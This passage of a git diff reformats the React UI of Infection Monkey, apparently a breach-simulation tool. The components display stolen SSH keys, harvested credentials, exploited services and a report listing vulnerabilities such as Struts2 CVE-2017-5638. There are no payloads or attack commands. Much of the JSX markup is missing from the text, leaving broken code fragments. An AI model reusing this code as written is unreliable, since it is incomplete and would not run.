x.attempt_cnt, style: {'whiteSpace': 'unset'}, width: 160}, + { + Header: 'Successful credentials', + id: 'credentials', + accessor: x => this.renderCreds(x.successful_creds), + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; static renderCreds(creds) { return {creds.map(cred =>
{cred}
)} diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1129.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1129.js index 64db13f81..cd19be877 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1129.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1129.js @@ -16,10 +16,10 @@ class T1129 extends React.Component {
{this.props.data.dlls.length !== 0 ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1145.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1145.js index 641602dc5..2383a0bcc 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1145.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1145.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, ScanStatus} from "./Helpers" class T1145 extends React.Component { @@ -10,11 +10,11 @@ class T1145 extends React.Component { super(props); } - static renderSSHKeys(keys){ + static renderSSHKeys(keys) { let output = []; - keys.forEach(function(keyInfo){ - output.push(
- SSH key pair used by {keyInfo['name']} user found in {keyInfo['home_dir']}
) + keys.forEach(function (keyInfo) { + output.push(
+ SSH key pair used by {keyInfo['name']} user found in {keyInfo['home_dir']}
) }); return (
{output}
); } @@ -22,16 +22,21 @@ class T1145 extends React.Component { static getKeysInfoColumns() { return ([{ columns: [ - {Header: 'Machine', + { + Header: 'Machine', id: 'machine', accessor: x => renderMachineFromSystemData(x.machine), - style: { 'whiteSpace': 'unset' }}, - {Header: 'Keys found', + style: {'whiteSpace': 'unset'} + }, + { + Header: 'Keys found', id: 'keys', accessor: x => T1145.renderSSHKeys(x.ssh_info), - style: { 'whiteSpace': 'unset' }}, - ] - }])}; + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; render() { return ( @@ -40,10 +45,10 @@ class T1145 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1188.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1188.js index 31be117a9..acddac84a 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1188.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1188.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData, ScanStatus } from "./Helpers" +import {renderMachineFromSystemData, ScanStatus} from "./Helpers" class T1188 extends React.Component { @@ -14,20 +14,27 @@ class T1188 extends React.Component { return ([{ Header: "Communications through multi-hop proxies", columns: [ - {Header: 'From', + { + Header: 'From', id: 'from', accessor: x => renderMachineFromSystemData(x.from), - style: { 'whiteSpace': 'unset' }}, - {Header: 'To', + style: {'whiteSpace': 'unset'} + }, + { + Header: 'To', id: 'to', accessor: x => renderMachineFromSystemData(x.to), - style: { 'whiteSpace': 'unset' }}, - {Header: 'Hops', + style: {'whiteSpace': 'unset'} + }, + { + Header: 'Hops', id: 'hops', accessor: x => x.count, - style: { 'whiteSpace': 'unset' }}, - ] - }])}; + style: {'whiteSpace': 'unset'} + }, + ] + }]) + }; render() { return ( @@ -36,10 +43,10 @@ class T1188 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""} ); diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1197.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1197.js index 8dc655aee..d82f51e3a 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1197.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1197.js @@ -1,37 +1,43 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine } from "./Helpers" +import {renderMachine} from "./Helpers" class T1210 extends React.Component { constructor(props) { super(props); - this.columns = [ {Header: 'Machine', - id: 'machine', accessor: x => renderMachine(x), - style: { 'whiteSpace': 'unset' }, - width: 200}, - {Header: 'Time', - id: 'time', accessor: x => x.time, - style: { 'whiteSpace': 'unset' }, - width: 170}, - {Header: 'Usage', - id: 'usage', accessor: x => x.usage, - style: { 'whiteSpace': 'unset' }} - ] + this.columns = [{ + Header: 'Machine', + id: 'machine', accessor: x => renderMachine(x), + style: {'whiteSpace': 'unset'}, + width: 200 + }, + { + Header: 'Time', + id: 'time', accessor: x => x.time, + style: {'whiteSpace': 'unset'}, + width: 170 + }, + { + Header: 'Usage', + id: 'usage', accessor: x => x.usage, + style: {'whiteSpace': 'unset'} + } + ] } - renderExploitedMachines(){ - if (this.props.data.bits_jobs.length === 0){ - return (
) + renderExploitedMachines() { + if (this.props.data.bits_jobs.length === 0) { + return (
) } else { return () + columns={this.columns} + data={this.props.data.bits_jobs} + showPagination={false} + defaultPageSize={this.props.data.bits_jobs.length} + />) } } diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1210.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1210.js index 9b6266efa..2a66d97bb 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1210.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1210.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine } from "./Helpers" +import {renderMachine} from "./Helpers" class T1210 extends React.Component { @@ -14,40 +14,52 @@ class T1210 extends React.Component { return ([{ Header: "Found services", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), - style: { 'whiteSpace': 'unset' }, width: 200}, - {Header: 'Time', id: 'time', accessor: x => x.time, style: { 'whiteSpace': 'unset' }}, - {Header: 'Port', id: 'port', accessor: x =>x.service.port, style: { 'whiteSpace': 'unset' }, width: 100}, - {Header: 'Service', id: 'service', accessor: x => x.service.display_name, style: { 'whiteSpace': 'unset' }} - ] - }])} + { + Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), + style: {'whiteSpace': 'unset'}, width: 200 + }, + {Header: 'Time', id: 'time', accessor: x => x.time, style: {'whiteSpace': 'unset'}}, + {Header: 'Port', id: 'port', accessor: x => x.service.port, style: {'whiteSpace': 'unset'}, width: 100}, + {Header: 'Service', id: 'service', accessor: x => x.service.display_name, style: {'whiteSpace': 'unset'}} + ] + }]) + } static getExploitColumns() { return ([{ Header: "Exploited services", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), - style: { 'whiteSpace': 'unset' }, width: 200}, - {Header: 'Time', id: 'time', accessor: x => x.time, style: { 'whiteSpace': 'unset' }}, - {Header: 'Port/url', id: 'port', accessor: x =>this.renderEndpoint(x.service), style: { 'whiteSpace': 'unset' }, - width: 170}, - {Header: 'Service', id: 'service', accessor: x => x.service.display_name, style: { 'whiteSpace': 'unset' }} - ] - }])}; + { + Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), + style: {'whiteSpace': 'unset'}, width: 200 + }, + {Header: 'Time', id: 'time', accessor: x => x.time, style: {'whiteSpace': 'unset'}}, + { + Header: 'Port/url', id: 'port', accessor: x => this.renderEndpoint(x.service), style: {'whiteSpace': 'unset'}, + width: 170 + }, + {Header: 'Service', id: 'service', accessor: x => x.service.display_name, style: {'whiteSpace': 'unset'}} + ] + }]) + }; - static renderEndpoint(val){ + static renderEndpoint(val) { return ( {(val.vulnerable_urls.length !== 0 ? val.vulnerable_urls[0] : val.vulnerable_ports[0])} ) }; - static formatScanned(data){ + static formatScanned(data) { let result = []; - for(let service in data.machine.services){ - let scanned_service = {'machine': data.machine, - 'time': data.time, - 'service': {'port': [data.machine.services[service].port], - 'display_name': data.machine.services[service].display_name}}; + for (let service in data.machine.services) { + let scanned_service = { + 'machine': data.machine, + 'time': data.time, + 'service': { + 'port': [data.machine.services[service].port], + 'display_name': data.machine.services[service].display_name + } + }; result.push(scanned_service) } return result @@ -58,10 +70,10 @@ class T1210 extends React.Component {

) } @@ -71,10 +83,10 @@ class T1210 extends React.Component {

) } diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1222.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1222.js index 712512bcb..4162196a5 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1222.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1222.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachine, ScanStatus } from "./Helpers" +import {renderMachine, ScanStatus} from "./Helpers" class T1222 extends React.Component { @@ -14,10 +14,11 @@ class T1222 extends React.Component { return ([{ Header: "Permission modification commands", columns: [ - {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), style: { 'whiteSpace': 'unset' }}, - {Header: 'Command', id: 'command', accessor: x => x.command, style: { 'whiteSpace': 'unset' }}, - ] - }])}; + {Header: 'Machine', id: 'machine', accessor: x => renderMachine(x.machine), style: {'whiteSpace': 'unset'}}, + {Header: 'Command', id: 'command', accessor: x => x.command, style: {'whiteSpace': 'unset'}}, + ] + }]) + }; render() { return ( @@ -26,10 +27,10 @@ class T1222 extends React.Component {
{this.props.data.status === ScanStatus.USED ? : ""}
); diff --git a/monkey/monkey_island/cc/ui/src/components/map/preview-pane/InfMapPreviewPane.js b/monkey/monkey_island/cc/ui/src/components/map/preview-pane/InfMapPreviewPane.js index e06043c20..06223bba1 100644 --- a/monkey/monkey_island/cc/ui/src/components/map/preview-pane/InfMapPreviewPane.js +++ b/monkey/monkey_island/cc/ui/src/components/map/preview-pane/InfMapPreviewPane.js @@ -84,14 +84,14 @@ class InfMapPreviewPaneComponent extends PreviewPaneComponent { unescapeLog(st) { return st.substr(1, st.length - 2) // remove quotation marks on beginning and end of string. - .replace(/\\n/g, "\n") - .replace(/\\r/g, "\r") - .replace(/\\t/g, "\t") - .replace(/\\b/g, "\b") - .replace(/\\f/g, "\f") - .replace(/\\"/g, '\"') - .replace(/\\'/g, "\'") - .replace(/\\&/g, "\&"); + .replace(/\\n/g, "\n") + .replace(/\\r/g, "\r") + .replace(/\\t/g, "\t") + .replace(/\\b/g, "\b") + .replace(/\\f/g, "\f") + .replace(/\\"/g, '\"') + .replace(/\\'/g, "\'") + .replace(/\\&/g, "\&"); } downloadLog(asset) { diff --git a/monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js b/monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js index 327d77061..3ef3ab76d 100644 --- a/monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js +++ b/monkey/monkey_island/cc/ui/src/components/map/preview-pane/PreviewPane.js @@ -92,14 +92,14 @@ class PreviewPaneComponent extends AuthComponent { unescapeLog(st) { return st.substr(1, st.length - 2) // remove quotation marks on beginning and end of string. - .replace(/\\n/g, "\n") - .replace(/\\r/g, "\r") - .replace(/\\t/g, "\t") - .replace(/\\b/g, "\b") - .replace(/\\f/g, "\f") - .replace(/\\"/g, '\"') - .replace(/\\'/g, "\'") - .replace(/\\&/g, "\&"); + .replace(/\\n/g, "\n") + .replace(/\\r/g, "\r") + .replace(/\\t/g, "\t") + .replace(/\\b/g, "\b") + .replace(/\\f/g, "\f") + .replace(/\\"/g, '\"') + .replace(/\\'/g, "\'") + .replace(/\\&/g, "\&"); } downloadLog(asset) { diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js index 43dac797c..9b9be2340 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ConfigurePage.js @@ -3,7 +3,7 @@ import Form from 'react-jsonschema-form'; import {Col, Modal, Nav, NavItem} from 'react-bootstrap'; import fileDownload from 'js-file-download'; import AuthComponent from '../AuthComponent'; -import { FilePond } from 'react-filepond'; +import {FilePond} from 'react-filepond'; import 'filepond/dist/filepond.min.css'; import MatrixComponent from "../attack/MatrixComponent"; @@ -37,7 +37,7 @@ class ConfigurePageComponent extends AuthComponent { }; } - getUiSchemas(){ + getUiSchemas() { return ({ basic: {"ui:order": ["general", "credentials"]}, basic_network: {}, @@ -94,8 +94,11 @@ class ConfigurePageComponent extends AuthComponent { this.setInitialConfig(monkeyConfig.configuration); this.setInitialAttackConfig(attackConfig.configuration); for (let sectionKey of this.sectionsOrder) { - if (sectionKey === 'attack') {sections.push({key:sectionKey, title: "ATT&CK"})} - else {sections.push({key: sectionKey, title: monkeyConfig.schema.properties[sectionKey].title});} + if (sectionKey === 'attack') { + sections.push({key: sectionKey, title: "ATT&CK"}) + } else { + sections.push({key: sectionKey, title: monkeyConfig.schema.properties[sectionKey].title}); + } } this.setState({ schema: monkeyConfig.schema, @@ -110,15 +113,15 @@ class ConfigurePageComponent extends AuthComponent { updateConfig = () => { this.authFetch(CONFIG_URL) - .then(res => res.json()) - .then(data => { - this.setInitialConfig(data.configuration); - this.setState({configuration: data.configuration}) - }) + .then(res => res.json()) + .then(data => { + this.setInitialConfig(data.configuration); + this.setState({configuration: data.configuration}) + }) }; onSubmit = () => { - if (this.state.selectedSection === 'attack'){ + if (this.state.selectedSection === 'attack') { this.matrixSubmit() } else { this.configSubmit() @@ -134,13 +137,14 @@ class ConfigurePageComponent extends AuthComponent { body: JSON.stringify(this.state.attackConfig) }) .then(res => { - if (!res.ok) - { + if (!res.ok) { throw Error() } return res; }) - .then(() => {this.setInitialAttackConfig(this.state.attackConfig);}) + .then(() => { + this.setInitialAttackConfig(this.state.attackConfig); + }) .then(this.updateConfig()) .then(this.setState({lastAction: 'saved'})) .catch(error => { @@ -162,28 +166,28 @@ class ConfigurePageComponent extends AuthComponent { this.setInitialConfig(res.configuration); this.props.onStatusChange(); }).catch(error => { - console.log('bad configuration'); - this.setState({lastAction: 'invalid_configuration'}); - }); + console.log('bad configuration'); + this.setState({lastAction: 'invalid_configuration'}); + }); }; // Alters attack configuration when user toggles technique - attackTechniqueChange = (technique, value, mapped=false) => { + attackTechniqueChange = (technique, value, mapped = false) => { // Change value in attack configuration // Go trough each column in matrix, searching for technique Object.entries(this.state.attackConfig).forEach(techType => { - if(techType[1].properties.hasOwnProperty(technique)){ + if (techType[1].properties.hasOwnProperty(technique)) { let tempMatrix = this.state.attackConfig; tempMatrix[techType[0]].properties[technique].value = value; this.setState({attackConfig: tempMatrix}); // Toggle all mapped techniques - if (! mapped ){ + if (!mapped) { // Loop trough each column and each row Object.entries(this.state.attackConfig).forEach(otherType => { Object.entries(otherType[1].properties).forEach(otherTech => { // If this technique depends on a technique that was changed - if (otherTech[1].hasOwnProperty('depends_on') && otherTech[1]['depends_on'].includes(technique)){ + if (otherTech[1].hasOwnProperty('depends_on') && otherTech[1]['depends_on'].includes(technique)) { this.attackTechniqueChange(otherTech[0], value, true) } }) @@ -207,41 +211,47 @@ class ConfigurePageComponent extends AuthComponent { }; renderAttackAlertModal = () => { - return ( {this.setState({showAttackAlert: false})}}> - -

Warning

-

- You have unsubmitted changes. Submit them before proceeding. -

-
- -
- - ) + return ( { + this.setState({showAttackAlert: false}) + }}> + +

+
Warning
+

+

+ You have unsubmitted changes. Submit them before proceeding. +

+
+ +
+ + ) }; - userChangedConfig(){ - if(JSON.stringify(this.state.configuration) === JSON.stringify(this.initialConfig)){ - if(Object.keys(this.currentFormData).length === 0 || - JSON.stringify(this.initialConfig[this.currentSection]) === JSON.stringify(this.currentFormData)){ + userChangedConfig() { + if (JSON.stringify(this.state.configuration) === JSON.stringify(this.initialConfig)) { + if (Object.keys(this.currentFormData).length === 0 || + JSON.stringify(this.initialConfig[this.currentSection]) === JSON.stringify(this.currentFormData)) { return false; } } return true; } - userChangedMatrix(){ + userChangedMatrix() { return (JSON.stringify(this.state.attackConfig) !== JSON.stringify(this.initialAttackConfig)) } setSelectedSection = (key) => { if ((key === 'attack' && this.userChangedConfig()) || - (this.currentSection === 'attack' && this.userChangedMatrix())){ + (this.currentSection === 'attack' && this.userChangedMatrix())) { this.setState({showAttackAlert: true}); return; } @@ -270,9 +280,11 @@ class ConfigurePageComponent extends AuthComponent { this.setInitialConfig(res.configuration); this.props.onStatusChange(); }); - this.authFetch(ATTACK_URL,{ method: 'POST', - headers: {'Content-Type': 'application/json'}, - body: JSON.stringify('reset_attack_matrix')}) + this.authFetch(ATTACK_URL, { + method: 'POST', + headers: {'Content-Type': 'application/json'}, + body: JSON.stringify('reset_attack_matrix') + }) .then(res => res.json()) .then(res => { this.setState({attackConfig: res.configuration}); @@ -280,16 +292,18 @@ class ConfigurePageComponent extends AuthComponent { }) }; - removePBAfiles(){ + removePBAfiles() { // We need to clean files from widget, local state and configuration (to sync with bac end) - if (this.PBAwindowsPond !== null){ + if (this.PBAwindowsPond !== null) { this.PBAwindowsPond.removeFile(); } - if (this.PBAlinuxPond !== null){ + if (this.PBAlinuxPond !== null) { this.PBAlinuxPond.removeFile(); } - let request_options = {method: 'DELETE', - headers: {'Content-Type': 'text/plain'}}; + let request_options = { + method: 'DELETE', + headers: {'Content-Type': 'text/plain'} + }; this.authFetch('/api/fileUpload/PBAlinux', request_options); this.authFetch('/api/fileUpload/PBAwindows', request_options); this.setState({PBAlinuxFile: [], PBAwinFile: []}); @@ -300,9 +314,12 @@ class ConfigurePageComponent extends AuthComponent { this.setState({ configuration: JSON.parse(event.target.result), lastAction: 'import_success' - }, () => {this.sendConfig(); this.setInitialConfig(JSON.parse(event.target.result))}); + }, () => { + this.sendConfig(); + this.setInitialConfig(JSON.parse(event.target.result)) + }); this.currentFormData = {}; - } catch(SyntaxError) { + } catch (SyntaxError) { this.setState({lastAction: 'import_failure'}); } }; @@ -315,18 +332,17 @@ class ConfigurePageComponent extends AuthComponent { sendConfig() { return ( this.authFetch('/api/configuration/island', - { - method: 'POST', - headers: {'Content-Type': 'application/json'}, - body: JSON.stringify(this.state.configuration) - }) - .then(res => { - if (!res.ok) { - throw Error() - } - return res; - }).catch(error => { + method: 'POST', + headers: {'Content-Type': 'application/json'}, + body: JSON.stringify(this.state.configuration) + }) + .then(res => { + if (!res.ok) { + throw Error() + } + return res; + }).catch(error => { console.log('bad configuration'); this.setState({lastAction: 'invalid_configuration'}); })); @@ -355,12 +371,13 @@ class ConfigurePageComponent extends AuthComponent { PBAwindows = () => { return ( { @@ -374,12 +391,13 @@ class ConfigurePageComponent extends AuthComponent { PBAlinux = () => { return ( { @@ -391,23 +409,23 @@ class ConfigurePageComponent extends AuthComponent { />) }; - getWinPBAfile(){ - if (this.state.PBAwinFile.length !== 0){ + getWinPBAfile() { + if (this.state.PBAwinFile.length !== 0) { return ConfigurePageComponent.getMockPBAfile(this.state.PBAwinFile[0]) - } else if (this.state.configuration.monkey.behaviour.PBA_windows_filename){ + } else if (this.state.configuration.monkey.behaviour.PBA_windows_filename) { return ConfigurePageComponent.getFullPBAfile(this.state.configuration.monkey.behaviour.PBA_windows_filename) } } - getLinuxPBAfile(){ - if (this.state.PBAlinuxFile.length !== 0){ + getLinuxPBAfile() { + if (this.state.PBAlinuxFile.length !== 0) { return ConfigurePageComponent.getMockPBAfile(this.state.PBAlinuxFile[0]) } else if (this.state.configuration.monkey.behaviour.PBA_linux_filename) { return ConfigurePageComponent.getFullPBAfile(this.state.configuration.monkey.behaviour.PBA_linux_filename) } } - static getFullPBAfile(filename){ + static getFullPBAfile(filename) { return [{ source: filename, options: { @@ -416,7 +434,7 @@ class ConfigurePageComponent extends AuthComponent { }]; } - static getMockPBAfile(mockFile){ + static getMockPBAfile(mockFile) { let pbaFile = [{ source: mockFile.name, options: { @@ -437,39 +455,39 @@ class ConfigurePageComponent extends AuthComponent { renderConfigContent = (displayedSchema) => { return (
- {this.renderBasicNetworkWarning()} -
- -
-
) + {this.renderBasicNetworkWarning()} +
+ +
+
) }; renderRunningMonkeysWarning = () => { return (
- { this.state.allMonkeysAreDead ? - '' : -
- - Some monkeys are currently running. Note that changing the configuration will only apply to new - infections. -
- } -
) + {this.state.allMonkeysAreDead ? + '' : +
+ + Some monkeys are currently running. Note that changing the configuration will only apply to new + infections. +
+ } + ) }; renderBasicNetworkWarning = () => { - if (this.state.selectedSection === 'basic_network'){ + if (this.state.selectedSection === 'basic_network') { return (
- - The Monkey scans its subnet if "Local network scan" is ticked. Additionally the monkey scans machines - according to its range class. -
) + + The Monkey scans its subnet if "Local network scan" is ticked. Additionally the monkey scans machines + according to its range class. + ) } else { - return (
) + return (
) } }; @@ -477,8 +495,8 @@ class ConfigurePageComponent extends AuthComponent { return () + {this.state.sections.map(section => {section.title})} + ) }; render() { @@ -488,9 +506,9 @@ class ConfigurePageComponent extends AuthComponent { displayedSchema['definitions'] = this.state.schema['definitions']; } let content = ''; - if (this.state.selectedSection === 'attack' && Object.entries(this.state.attackConfig).length !== 0 ) { + if (this.state.selectedSection === 'attack' && Object.entries(this.state.attackConfig).length !== 0) { content = this.renderMatrix() - } else if(this.state.selectedSection !== 'attack') { + } else if (this.state.selectedSection !== 'attack') { content = this.renderConfigContent(displayedSchema) } return ( @@ -498,8 +516,8 @@ class ConfigurePageComponent extends AuthComponent { {this.renderAttackAlertModal()}

Monkey Configuration

{this.renderNav()} - { this.renderRunningMonkeysWarning()} - { content } + {this.renderRunningMonkeysWarning()} + {content}
- +
- { this.state.lastAction === 'reset' ? + {this.state.lastAction === 'reset' ?
Configuration reset successfully.
: ''} - { this.state.lastAction === 'saved' ? + {this.state.lastAction === 'saved' ?
Configuration saved successfully.
: ''} - { this.state.lastAction === 'import_failure' ? + {this.state.lastAction === 'import_failure' ?
Failed importing configuration. Invalid config file.
: ''} - { this.state.lastAction === 'invalid_configuration' ? + {this.state.lastAction === 'invalid_configuration' ?
An invalid configuration file was imported or submitted.
: ''} - { this.state.lastAction === 'import_success' ? + {this.state.lastAction === 'import_success' ?
Configuration imported successfully. diff --git a/monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js b/monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js index b7a2ec077..3abd1682c 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/LicensePage.js @@ -18,8 +18,8 @@ class LicensePageComponent extends React.Component {

License

- Copyright 2017 Guardicore Ltd. -
+ Copyright 2017 Guardicore Ltd. +
Licensed under GPLv3.

diff --git a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js index 4d074c835..779a3c894 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/MapPage.js @@ -52,7 +52,7 @@ class MapPageComponent extends AuthComponent { }; updateTelemetryFromServer = () => { - this.authFetch('/api/telemetry-feed?timestamp='+this.state.telemetryLastTimestamp) + this.authFetch('/api/telemetry-feed?timestamp=' + this.state.telemetryLastTimestamp) .then(res => res.json()) .then(res => { let newTelem = this.state.telemetry.concat(res['telemetries']); @@ -71,8 +71,7 @@ class MapPageComponent extends AuthComponent { this.authFetch('/api/netmap/node?id=' + event.nodes[0]) .then(res => res.json()) .then(res => this.setState({selected: res, selectedType: 'node'})); - } - else if (event.edges.length === 1) { + } else if (event.edges.length === 1) { let displayedEdge = this.state.graph.edges.find( function (edge) { return edge['id'] === event.edges[0]; @@ -84,8 +83,7 @@ class MapPageComponent extends AuthComponent { .then(res => res.json()) .then(res => this.setState({selected: res.edge, selectedType: 'edge'})); } - } - else { + } else { this.setState({selected: null, selectedType: null}); } } @@ -100,7 +98,9 @@ class MapPageComponent extends AuthComponent { return ( this.setState({showKillDialog: false})}> -

Are you sure you want to kill all monkeys?

+

+
Are you sure you want to kill all monkeys?
+

This might take a few moments...

@@ -153,15 +153,15 @@ class MapPageComponent extends AuthComponent {
Legend: - Exploit + Exploit | - Scan + Scan | - Tunnel + Tunnel | - Island Communication + Island Communication
- { this.renderTelemetryConsole() } + {this.renderTelemetryConsole()}
@@ -174,7 +174,8 @@ class MapPageComponent extends AuthComponent {
Monkey Telemetry - diff --git a/monkey/monkey_island/cc/ui/src/components/pages/PassTheHashMapPage.js b/monkey/monkey_island/cc/ui/src/components/pages/PassTheHashMapPage.js index 20faafca7..66dc7e089 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/PassTheHashMapPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/PassTheHashMapPage.js @@ -29,15 +29,13 @@ class PassTheHashMapPageComponent extends AuthComponent { return node['id'] === event.nodes[0]; }); this.setState({selected: displayedNode, selectedType: 'node'}) - } - else if (event.edges.length === 1) { + } else if (event.edges.length === 1) { let displayedEdge = this.state.graph.edges.find( function (edge) { return edge['id'] === event.edges[0]; }); - this.setState({selected: displayedEdge, selectedType: 'edge'}); - } - else { + this.setState({selected: displayedEdge, selectedType: 'edge'}); + } else { this.setState({selected: null, selectedType: null}); } } diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js index 68ba84aa6..c3b538c70 100644 --- a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js +++ b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js @@ -135,19 +135,21 @@ class ReportPageComponent extends AuthComponent { } else { content =
- {this.generateReportOverviewSection()} - {this.generateReportFindingsSection()} - {this.generateReportRecommendationsSection()} - {this.generateReportGlanceSection()} - {this.generateAttackSection()} - {this.generateReportFooter()} + {this.generateReportOverviewSection()} + {this.generateReportFindingsSection()} + {this.generateReportRecommendationsSection()} + {this.generateReportGlanceSection()} + {this.generateAttackSection()} + {this.generateReportFooter()}
; } return (
- {print();}} /> + { + print(); + }}/>
@@ -155,7 +157,9 @@ class ReportPageComponent extends AuthComponent { {content}
- {print();}} /> + { + print(); + }}/>
); @@ -269,14 +273,14 @@ class ReportPageComponent extends AuthComponent { return x === true; }).length > 0 ?
- During this simulated attack the Monkey uncovered {this.state.report.overview.issues.filter(function (x) { return x === true; }).length} threats:
    {this.state.report.overview.issues[this.Issue.STOLEN_SSH_KEYS] ? -
  • Stolen SSH keys are used to exploit other machines.
    • : null } +
  • Stolen SSH keys are used to exploit other machines.
    • : null} {this.state.report.overview.issues[this.Issue.STOLEN_CREDS] ?
  • Stolen credentials are used to exploit other machines.
    • : null} {this.state.report.overview.issues[this.Issue.ELASTIC] ? @@ -309,15 +313,16 @@ class ReportPageComponent extends AuthComponent { {this.state.report.overview.issues[this.Issue.STRUTS2] ?
  • Struts2 servers are vulnerable to remote code execution. ( - CVE-2017-5638)
    • : null } + CVE-2017-5638) : null} {this.state.report.overview.issues[this.Issue.WEBLOGIC] ? -
  • Oracle WebLogic servers are susceptible to a remote code execution vulnerability.
    • : null } +
  • Oracle WebLogic servers are susceptible to a remote code execution vulnerability.
    • : null} {this.state.report.overview.issues[this.Issue.HADOOP] ? -
  • Hadoop/Yarn servers are vulnerable to remote code execution.
    • : null } +
  • Hadoop/Yarn servers are vulnerable to remote code execution.
    • : null} {this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ? -
  • Mimikatz found login credentials of a user who has admin access to a server defined as critical.
    • : null } +
  • Mimikatz found login credentials of a user who has admin access to a server defined as + critical.
    • : null} {this.state.report.overview.issues[this.Issue.MSSQL] ? -
  • MS-SQL servers are vulnerable to remote code execution via xp_cmdshell command.
    • : null } +
  • MS-SQL servers are vulnerable to remote code execution via xp_cmdshell command.
    • : null}
: @@ -344,7 +349,8 @@ class ReportPageComponent extends AuthComponent { {this.state.report.overview.warnings[this.Warning.TUNNEL] ?
  • Weak segmentation - Machines were able to communicate over unused ports.
    • : null} {this.state.report.overview.warnings[this.Warning.SHARED_LOCAL_ADMIN] ? -
  • Shared local administrator account - Different machines have the same account as a local administrator.
    • : null} +
  • Shared local administrator account - Different machines have the same account as a local + administrator.
    • : null} {this.state.report.overview.warnings[this.Warning.SHARED_PASSWORDS] ?
  • Multiple users have the same password
    • : null} @@ -355,7 +361,7 @@ class ReportPageComponent extends AuthComponent {
    }
    - { this.state.report.overview.cross_segment_issues.length > 0 ? + {this.state.report.overview.cross_segment_issues.length > 0 ?

    Segmentation Issues @@ -380,14 +386,14 @@ class ReportPageComponent extends AuthComponent { {/* Checks if there are any domain issues. If there are more then one: render the title. Otherwise, * don't render it (since the issues themselves will be empty. */} {Object.keys(this.state.report.recommendations.domain_issues).length !== 0 ? -

    Domain related recommendations

    : null } +

    Domain related recommendations

    : null}
    {this.generateIssues(this.state.report.recommendations.domain_issues)}
    {/* Checks if there are any issues. If there are more then one: render the title. Otherwise, * don't render it (since the issues themselves will be empty. */} {Object.keys(this.state.report.recommendations.issues).length !== 0 ? -

    Machine related recommendations

    : null } +

    Machine related recommendations

    : null}
    {this.generateIssues(this.state.report.recommendations.issues)}
    @@ -444,13 +450,13 @@ class ReportPageComponent extends AuthComponent {
    - {this.generateReportPthMap()} + {this.generateReportPthMap()}
    - +
    ); @@ -463,33 +469,35 @@ class ReportPageComponent extends AuthComponent { Credentials Map

    - This map visualizes possible attack paths through the network using credential compromise. Paths represent lateral movement opportunities by attackers. + This map visualizes possible attack paths through the network using credential compromise. Paths represent lateral + movement opportunities by attackers.

    Legend: - Access credentials | + Access credentials |
    - +
    -
    +
    ); } generateAttackSection() { return (
    -

    - ATT&CK report -

    -

    - This report shows information about ATT&CK techniques used by Infection Monkey. -

    -
